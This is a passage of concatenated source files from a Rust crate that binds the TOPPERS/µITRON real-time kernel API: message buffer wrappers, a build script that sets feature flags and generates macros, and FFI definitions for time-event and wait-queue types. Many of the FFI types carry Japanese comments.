abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MessageBufferRef::delete`].
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(feature = "doc_cfg", doc(cfg(all(feature = "dcre", not(feature = "asp3")))))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Message buffer information returned by [`MessageBufferRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RMBF,
}
impl Info {
/// Get the number of free bytes.
#[inline]
pub fn free_byte_count(&self) -> usize {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.fmbfsz,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the number of stored messages.
#[inline]
pub fn len(&self) -> usize {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.smbfcnt as usize,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get a flag indicating whether the message buffer is empty (i.e.,
/// contains no messages).
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
/// Get the first waiting sender's task ID.
#[inline]
pub fn first_waiting_sending_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.stskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the first waiting receiver's task ID.
#[inline]
pub fn first_waiting_receiving_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.rtskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// Literally anything.
pub trait Unknown {}
impl<T: ?Sized> Unknown for T {}
/// A borrowed reference to a message buffer.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MessageBufferRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for MessageBufferRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "MessageBuffer({})", self.id)
}
}
/// # Object ID conversion
impl MessageBufferRef<'_> {
/// Construct a `MessageBufferRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl MessageBufferRef<'_> {
/// `del_mbf`: Delete the message buffer.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_mbf")]
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
)]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_mbf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_mbf`: Get the message buffer's general information.
#[inline]
#[doc(alias = "ref_mbf")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_mbf(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Message Buffer Operations
impl MessageBufferRef<'_> {
/// `snd_mbf`: Send a message to the message buffer. Blocks the current task
/// if the message buffer is full.
#[inline]
#[doc(alias = "snd_mbf")]
pub fn send(self, message: &(impl Unknown + ?Sized)) -> Result<(), Error<SendError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
// If the message size doesn't fit in `uint_t`, it's guaranteed
// to exceed the message buffer's maximum message size.
// Safety: `E_PAR` is handled by `SendError`
// (Warning: This is not true for `cfg(feature = "none")`.)
let size = core::mem::size_of_val(message)
.try_into()
.ok()
.ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
Error::err_if_negative(abi::snd_mbf(
self.as_raw(),
message as *const _ as *const u8,
size,
))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `tsnd_mbf`: Send a message to the message buffer. Blocks the current
/// task with timeout if the message buffer is full.
#[inline]
#[doc(alias = "tsnd_mbf")]
pub fn send_timeout(
self,
message: &(impl Unknown + ?Sized),
tmo: Timeout,
) -> Result<(), Error<SendTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
// If the message size doesn't fit in `uint_t`, it's guaranteed
// to exceed the message buffer's maximum message size.
// Safety: `E_PAR` is handled by `SendTimeoutError`
// (Warning: This is not true for `cfg(feature = "none")`.)
let size = core::mem::size_of_val(message)
.try_into()
.ok()
.ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
Error::err_if_negative(abi::tsnd_mbf(
self.as_raw(),
message as *const _ as *const u8,
size,
tmo.as_raw(),
))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `psnd_mbf`: Send a message to the message buffer. Fails and returns an
/// error if the message buffer is full.
#[inline]
#[doc(alias = "psnd_mbf")]
pub fn try_send(self, message: &(impl Unknown + ?Sized)) -> Result<(), Error<TrySendError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
// If the message size doesn't fit in `uint_t`, it's guaranteed
// to exceed the message buffer's maximum message size.
// Safety: `E_PAR` is handled by `TrySendError`
// (Warning: This is not true for `cfg(feature = "none")`.)
let size = core::mem::size_of_val(message)
.try_into()
.ok()
.ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
Error::err_if_negative(abi::psnd_mbf(
self.as_raw(),
message as *const _ as *const u8,
size,
))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `rcv_mbf`: Receive a message from the message buffer. Blocks the current
/// task if the message buffer is empty.
///
/// On success, the received message will be written to `*out`, and the
/// message size, measured in bytes, will be returned.
///
/// # Rationale
///
/// This method is named `recv` instead of `receive` following the suit of
/// `std::sync::mpsc::Receiver::recv` and `std::net::UdpSocket::recv`.
///
/// # Safety
///
/// `*out` must be large enough to fit the message. After this method
/// overwrites `*out` with the received message, the resultant content of
/// `*out` must be valid for its type.
#[inline]
#[doc(alias = "rcv_mbf")]
pub unsafe fn recv(self, out: &mut (impl Unknown + ?Sized)) -> Result<usize, Error<RecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size =
Error::err_if_negative(abi::rcv_mbf(self.as_raw(), out as *mut _ as *mut u8))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `trcv_mbf`: Receive a message to the message buffer. Blocks the current
/// task with timeout if the message buffer is empty.
///
/// # Safety
///
/// See [`Self::recv`].
#[inline]
#[doc(alias = "trcv_mbf")]
pub unsafe fn recv_timeout(
self,
out: &mut (impl Unknown + ?Sized),
tmo: Timeout,
) -> Result<usize, Error<RecvTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size = Error::err_if_negative(abi::trcv_mbf(
self.as_raw(),
out as *mut _ as *mut u8,
tmo.as_raw(),
))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `prcv_mbf`: Receive a message to the message buffer. Fails and returns
/// an error if the message buffer is empty.
///
/// # Safety
///
/// See [`Self::recv`].
#[inline]
#[doc(alias = "prcv_mbf")]
pub unsafe fn try_recv(
self,
out: &mut (impl Unknown + ?Sized),
) -> Result<usize, Error<TryRecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size =
Error::err_if_negative(abi::prcv_mbf(self.as_raw(), out as *mut _ as *mut u8))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_mbf`: Initialize the message buffer.
#[inline]
#[doc(alias = "ini_mbf")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_mbf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
// Note that TOPPERS/ASP3 doesn't support dynamic creation of message buffers
// because message buffers and dynamic creation are provided by separate
// extensions.
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
pub use self::owned::*;
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
/// The builder type for [message buffers](MessageBuffer).
/// Created by [`MessageBuffer::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
)]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<Capacity, MaxMessageSize> {
capacity: Capacity,
max_message_size: MaxMessageSize,
maxmsz_overflow: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CMBF,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
pub struct __block_size_is_not_specified__;
pub struct __block_count_is_not_specified__;
}
impl MessageBuffer {
/// `acre_mbf`: Create a builder for `MessageBuffer`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::messagebuffer::MessageBuffer;
/// let buffer = MessageBuffer::build()
/// .capacity(128)
/// .max_message_size(64)
/// .finish()
/// .expect("failed to create a message buffer");
///
/// buffer.as_ref().send(&[0u8; 32])
/// .expect("failed to send a message");
///
/// let mut got_message = [0u8; 64];
/// let got_message_len = unsafe {
/// buffer
/// .as_ref()
/// .recv(&mut got_message)
/// .expect("failed to receive a message")
/// };
/// assert_eq!(got_message_len, 32);
/// ```
///
#[inline]
#[doc(alias = "acre_mbf")]
pub fn build() -> Builder<
builder_hole::__block_size_is_not_specified__,
builder_hole::__block_count_is_not_specified__,
> {
Builder {
capacity: builder_hole::__block_size_is_not_specified__,
max_message_size: builder_hole::__block_count_is_not_specified__,
maxmsz_overflow: false,
#[cfg(not(feature = "none"))]
raw: abi::T_CMBF {
mbfatr: abi::TA_NULL,
mbfsz: 0,
maxmsz: 0,
mbfmb: core::ptr::null_mut(),
},
}
}
}
impl<Capacity, MaxMessageSize> Builder<Capacity, MaxMessageSize> {
/// (**Mandatory**) Specify the capacity, measured in bytes.
#[inline]
pub fn capacity(self, value: usize) -> Builder<(), MaxMessageSize> {
Builder {
capacity: (),
max_message_size: self.max_message_size,
maxmsz_overflow: self.maxmsz_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMBF {
mbfsz: value,
..self.raw
},
}
}
/// (**Mandatory**) Specify the maximum message size, measured in bytes.
#[inline]
pub fn max_message_size(self, value: usize) -> Builder<Capacity, ()> {
let (maxmsz, maxmsz_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
capacity: self.capacity,
max_message_size: (),
maxmsz_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMBF { maxmsz, ..self.raw },
}
}
}
impl Builder<(), ()> {
/// Create a message buffer using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<MessageBuffer, Error<BuildError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
if self.maxmsz_overflow {
// Safety: `E_NOMEM` is handled by `BuildError`
// (Warning: This is not true for `cfg(feature = "none")`.)
return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
}
let id = Error::err_if_negative(abi::acre_mbf(&self.raw))?;
// Safety: We own the message buffer we create
Ok(MessageBuffer::from_raw_nonnull(
abi::NonNullID::new_unchecked(id),
))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned message buffer.
///
/// [Deletes] the message buffer automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: MessageBufferRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
)]
pub struct MessageBuffer(MessageBufferRef<'static>);
impl fmt::Debug for MessageBuffer {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for MessageBuffer {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl MessageBuffer {
/// Construct a `MessageBuffer` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { MessageBufferRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `MessageBufferRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> MessageBufferRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `MessageBuffer` as [`MessageBufferRef`].
///
/// Use this to perform operations on message buffers because most of the
/// methods are implemented on `MessageBufferRef` but not `MessageBuffer`.
#[inline]
pub const fn as_ref(&self) -> MessageBufferRef<'_> {
self.0
}
}
}
<file_sep>/build.rs
use std::{env, fmt::Write, fs, path::Path};
fn main() {
// Validate the kernel selection and select `std` if none are selected
const KERNEL_LIST: &[&str] = &["asp3", "fmp3", "solid_asp3", "solid_fmp3"];
let selected_kernels: Vec<_> = KERNEL_LIST
.iter()
.filter(|name| {
env::var_os(format!("CARGO_FEATURE_{}", name.to_ascii_uppercase())).is_some()
})
.collect();
if selected_kernels.len() > 1 {
panic!("more than one kernel is selected: {:?}", selected_kernels);
}
if selected_kernels.is_empty() {
// Default to `none` if none are selected
// (Maintainer note: Please make sure to synchronize the transitive
// features with `Cargo.toml`)
println!("cargo:rustc-cfg=feature=\"none\"");
println!("cargo:rustc-cfg=feature=\"dcre\"");
println!("cargo:rustc-cfg=feature=\"rstr_task\"");
println!("cargo:rustc-cfg=feature=\"messagebuf\"");
println!("cargo:rustc-cfg=feature=\"ovrhdr\"");
println!("cargo:rustc-cfg=feature=\"subprio\"");
println!("cargo:rustc-cfg=feature=\"pi_mutex\"");
println!("cargo:rustc-cfg=feature=\"systim_local\"");
println!("cargo:rustc-cfg=feature=\"exd_tsk\"");
}
// Generate code for `itron::macros`
let mut macros_rs = String::new();
macro_rules! w {
($($tt:tt)*) => {
write!(macros_rs, $($tt)*).unwrap()
};
}
for kernel in KERNEL_LIST.iter().cloned().chain(["none"]) {
w!(
r#"
/// Get the kernel selected by a Cargo feature.
///
/// # Example
///
/// ```
/// let kernel = tt_call::tt_call! {{ macro = [{{ itron::macros::tt_kernel }}] }};
///
/// println!("We are running on {{}}", kernel);
/// ```
///
#[cfg(feature = "{kernel}")]
pub macro tt_kernel($caller:tt) {{
tt_call::tt_return! {{
$caller
output = [{{ "{kernel}" }}]
}}
}}
"#,
kernel = kernel,
);
w!(
r#"
/// Determine if this crate was compiled for the specified kernel.
///
/// # Example
///
/// ```
/// tt_call::tt_if! {{
/// condition = [{{ itron::macros::tt_is_kernel }}]
/// input = [{{ "asp3" }}]
/// true = [{{ println!("We are on TOPPERS/ASP3, yay!"); }}]
/// false = [{{}}]
/// }}
/// ```
///
#[cfg(feature = "{kernel}")]
pub macro tt_is_kernel {{
(
$caller:tt
input = [{{ "{kernel}" $(| $($rest:tt)* )? }}]
) => {{
tt_call::tt_return! {{
$caller
is = [{{ true }}]
}}
}},
(
$caller:tt
input = [{{ $other_kernel:literal $(| $($rest:tt)* )? }}]
) => {{
tt_is_kernel! {{
$caller
input = [{{ $( $($rest)* )? }}]
}}
}},
(
$caller:tt
input = [{{ }}]
) => {{
tt_call::tt_return! {{
$caller
is = [{{ false }}]
}}
}},
}}
"#,
kernel = kernel,
);
}
let out_dir = env::var_os("OUT_DIR").unwrap();
fs::write(&Path::new(&out_dir).join("macros.rs"), ¯os_rs).unwrap();
}
<file_sep>/src/abi/time.rs
#![allow(unused_imports)]
use super::{uint_t, ATR, ER, ER_ID, EXINF, FLGPTN, HRTCNT, ID, MODE, RELTIM, STAT, SYSTIM};
/*
* 処理単位の型定義
*/
pub type TMEHDR = Option<unsafe extern "C" fn(EXINF)>;
/*
* オブジェクト属性
*/
/// 周期通知を動作状態で生成
pub const TA_STA: ATR = 0x02;
/*
* 通知処理モードの定義
*/
/// タイムイベントハンドラの呼出し
pub const TNFY_HANDLER: MODE = 0x00;
/// 変数の設定
pub const TNFY_SETVAR: MODE = 0x01;
/// 変数のインクリメント
pub const TNFY_INCVAR: MODE = 0x02;
/// タスクの起動
pub const TNFY_ACTTSK: MODE = 0x03;
/// タスクの起床
pub const TNFY_WUPTSK: MODE = 0x04;
/// セマフォの資源の返却
pub const TNFY_SIGSEM: MODE = 0x05;
/// イベントフラグのセット
pub const TNFY_SETFLG: MODE = 0x06;
/// データキューへの送信
pub const TNFY_SNDDTQ: MODE = 0x07;
/// 変数の設定
pub const TENFY_SETVAR: MODE = 0x10;
/// 変数のインクリメント
pub const TENFY_INCVAR: MODE = 0x20;
/// タスクの起動
pub const TENFY_ACTTSK: MODE = 0x30;
/// タスクの起床
pub const TENFY_WUPTSK: MODE = 0x40;
/// セマフォの返却
pub const TENFY_SIGSEM: MODE = 0x50;
/// イベントフラグのセット
pub const TENFY_SETFLG: MODE = 0x60;
/// データキューへの送信
pub const TENFY_SNDDTQ: MODE = 0x70;
/// TOPPERS/ASP3 `T_RCYC`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RCYC {
/// 周期通知の動作状態
pub cycstat: STAT,
/// 次回通知時刻までの相対時間
pub lefttim: RELTIM,
}
/// TOPPERS/FMP3 `T_RCYC`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RCYC {
/// 周期通知の動作状態
pub cycstat: STAT,
/// 次回通知時刻までの相対時間
pub lefttim: RELTIM,
/// 割付けプロセッサのID
pub prcid: ID,
}
/// TOPPERS/ASP3 `T_RALM`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RALM {
/// アラーム通知の動作状態
pub almstat: STAT,
/// 通知時刻までの相対時間
pub lefttim: RELTIM,
}
/// TOPPERS/ASP3 `T_RALM`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RALM {
/// アラーム通知の動作状態
pub almstat: STAT,
/// 通知時刻までの相対時間
pub lefttim: RELTIM,
/// 割付けプロセッサのID
pub prcid: ID,
}
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ROVR {
/// オーバランハンドラの動作状態 */
pub ovrstat: STAT,
/// 残りプロセッサ時間 */
pub leftotm: super::PRCTIM,
}
/// TOPPERS/ASP3 `T_CCYC`
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CCYC {
/// 周期通知属性
pub cycatr: ATR,
/// 周期通知の通知方法
pub nfyinfo: T_NFYINFO,
/// 周期通知の通知周期
pub cyctim: RELTIM,
/// 周期通知の通知位相
pub cycphs: RELTIM,
}
/// SOLID/FMP3 `T_CCYC`
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CCYC {
/// 周期通知属性
pub cycatr: ATR,
/// 周期通知の通知方法
pub nfyinfo: T_NFYINFO,
/// 周期通知の通知周期
pub cyctim: RELTIM,
/// 周期通知の通知位相
pub cycphs: RELTIM,
#[cfg(feature = "systim_local")]
/// 周期通知の初期割付けプロセッサ
pub iprcid: ID,
#[cfg(feature = "systim_local")]
/// 周期通知の割付け可能プロセッサ
pub affinity: uint_t,
}
/// TOPPERS/ASP3 `T_CALM`
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CALM {
/// アラーム通知属性
pub almatr: ATR,
/// アラーム通知の通知方法
pub nfyinfo: T_NFYINFO,
}
/// SOLID/FMP3 `T_CALM`
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CALM {
/// アラーム通知属性
pub almatr: ATR,
/// アラーム通知の通知方法
pub nfyinfo: T_NFYINFO,
#[cfg(feature = "systim_local")]
/// アラーム通知の初期割付けプロセッサ
pub iprcid: ID,
#[cfg(feature = "systim_local")]
/// アラーム通知の割付け可能プロセッサ
pub affinity: uint_t,
}
/*
* タイムイベントの通知方法のパケット形式の定義
*/
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_NFYINFO {
/// 通知処理モード
pub nfymode: MODE,
/// タイムイベントの通知に関する付随情報
pub nfy: T_NFY,
/// エラーの通知に関する付随情報
pub enfy: T_ENFY,
}
/// [`T_NFYINFO::nfy`]
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub union T_NFY {
pub handler: T_NFY_HDR,
pub setvar: T_NFY_VAR,
pub incvar: T_NFY_IVAR,
pub acttsk: T_NFY_TSK,
pub wuptsk: T_NFY_TSK,
pub sigsem: T_NFY_SEM,
pub setflg: T_NFY_FLG,
pub snddtq: T_NFY_DTQ,
}
/// [`T_NFYINFO::enfy`]
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub union T_ENFY {
pub setvar: T_ENFY_VAR,
pub incvar: T_NFY_IVAR,
pub acttsk: T_NFY_TSK,
pub wuptsk: T_NFY_TSK,
pub sigsem: T_NFY_SEM,
pub setflg: T_NFY_FLG,
pub snddtq: T_ENFY_DTQ,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_NFY_HDR {
/// タイムイベントハンドラの拡張情報
pub exinf: EXINF,
/// タイムイベントハンドラの先頭番地
pub tmehdr: TMEHDR,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_VAR {
/// 変数の番地
pub p_var: *mut isize,
/// 設定する値
pub value: isize,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_IVAR {
/// 変数の番地
pub p_var: *mut isize,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_TSK {
/// タスクID
pub tskid: ID,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_SEM {
/// セマフォID
pub semid: ID,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_FLG {
/// イベントフラグID
pub flgid: ID,
#[cfg(all(
any(feature = "solid_asp3", feature = "solid_fmp3"),
target_pointer_width = "64",
))]
pub __pad_for_aarch64: u32,
/// セットするビットパターン
pub flgptn: FLGPTN,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_DTQ {
/// データキューID
pub dtqid: ID,
#[cfg(all(
any(feature = "solid_asp3", feature = "solid_fmp3"),
target_pointer_width = "64",
))]
pub __pad_for_aarch64: u32,
/// 送信する値
pub data: isize,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ENFY_VAR {
/// 変数の番地
pub p_var: *mut isize,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ENFY_DTQ {
/// データキューID
pub dtqid: ID,
}
/// 時間管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn set_tim(systim: SYSTIM) -> ER;
pub fn get_tim(p_systim: *mut SYSTIM) -> ER;
pub fn adj_tim(adjtim: i32) -> ER;
pub fn fch_hrt() -> HRTCNT;
pub fn sta_cyc(cycid: ID) -> ER;
pub fn stp_cyc(cycid: ID) -> ER;
pub fn ref_cyc(cycid: ID, pk_rcyc: *mut T_RCYC) -> ER;
pub fn sta_alm(almid: ID, almtim: RELTIM) -> ER;
pub fn stp_alm(almid: ID) -> ER;
pub fn ref_alm(almid: ID, pk_ralm: *mut T_RALM) -> ER;
}
/// 時間管理機能
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
pub fn acre_cyc(pk_ccyc: *const T_CCYC) -> ER_ID;
pub fn acre_alm(pk_calm: *const T_CALM) -> ER_ID;
pub fn del_cyc(cycid: ID) -> ER;
pub fn del_alm(almid: ID) -> ER;
}
/// 時間管理機能
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
pub fn msta_cyc(cycid: ID, prcid: ID) -> ER;
pub fn msta_alm(almid: ID, almtim: RELTIM, prcid: ID) -> ER;
}
/// 時間管理機能
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
extern "C" {
pub fn sta_ovr(tskid: ID, ovrtim: super::PRCTIM) -> ER;
pub fn stp_ovr(tskid: ID) -> ER;
pub fn ref_ovr(tskid: ID, pk_rovr: *mut T_ROVR) -> ER;
}
<file_sep>/src/wait.rs
//! Shared definitions for waitable objects
pub use crate::abi;
/// Specifies the sorting order of a wait queue.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum QueueOrder {
/// The wait queue is processed in a FIFO order.
Fifo,
/// The wait queue is processed in a task priority order.
TaskPriority,
}
impl QueueOrder {
/// Convert `self` to a value of type [`abi::ATR`].
#[inline]
pub fn as_raw_atr(self) -> abi::ATR {
match self {
#[cfg(not(feature = "none"))]
Self::Fifo => abi::TA_NULL,
#[cfg(not(feature = "none"))]
Self::TaskPriority => abi::TA_TPRI,
#[cfg(feature = "none")]
_ => unreachable!(),
}
}
}
<file_sep>/src/abi/sync.rs
use super::{uint_t, ATR, ER, ER_ID, FLGPTN, ID, MODE, PRI, RELTIM, STAT, TMO};
/*
* オブジェクト属性
*/
/// 待ち行列をタスクの優先度順にする
